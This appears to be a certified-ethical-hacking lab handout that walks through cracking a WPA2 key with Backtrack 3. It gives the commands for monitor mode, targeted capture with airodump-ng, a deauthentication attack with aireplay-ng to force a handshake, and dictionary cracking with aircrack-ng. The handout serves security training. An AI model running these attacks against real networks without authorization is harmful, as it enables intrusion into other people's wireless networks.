©2011-BR

CEH-WPA2

Configuration:

Your machine is BT3, running Backtrack 3

The IP address of your machine is 192.168.100.99/24.

Objectives:

1. Monitor Wireless Network and HACK the WPA2 Key.

Tools:

Backtrack 3
Airodump-ng
Aireplay-ng
Aircrack-ng

Preparation:

Ensure that your wireless card is detected in your BT3 machine.

Logon to BT3 and activate your wireless card.

1
 ©2011-BR

Detailed Steps:

1. Logon to your BT3, and then open a console , check your wireless configuration
using this command : iwconfig

2. Take a look at ‘Mode:managed” , this be must changed into the monitor mode, type :

bt ~ # iwconfig rausb0 mode monitor

3. After this your wireless interface is ready to monitor / capture traffic

4. Start to capture any wireless traffic around your environment :

bt ~ # airodump-ng rausb0

2
 ©2011-BR

5. Choose only one wireless network to capture. Press Control-C to stop capturing.

6. In this example we’re going to capture all data traffic of belly-wlan network (mac address :
00:1C:DF:D0:A4:9C), operating at channel 11, and then write the capture result to :
belly-wlan.cap file

bt ~ # airodump-ng --bssid 00:1C:DF:D0:A4:9C --channel 11

-w belly-wlan rausb0

3
 ©2011-BR

3. To crack WPA2 network, you must wait until theres a HANDSHAKE packet.

4. To enforce a handshake, you can just disconnect one client, when that client is
reconnecting, there will be a handshake. Use ‘deauth’ attack to disconnect a client :

bt ~ # aireplay-ng --deauth 5 –a 00:1C:DF:D0:A4:9C

–c 00:1C:BF:BA:AB:80 rausb0

4
 ©2011-BR

5. But you need a dictionary file to crack WPA. So create a small dictionary file for
sample :

bt ~ # nano dictionary.txt

5
 ©2011-BR

6. Then you can start cracking using aircrack-ng :

bt ~ # aircrack-ng –a 2 belly-wlan-01.cap –w dictionary.txt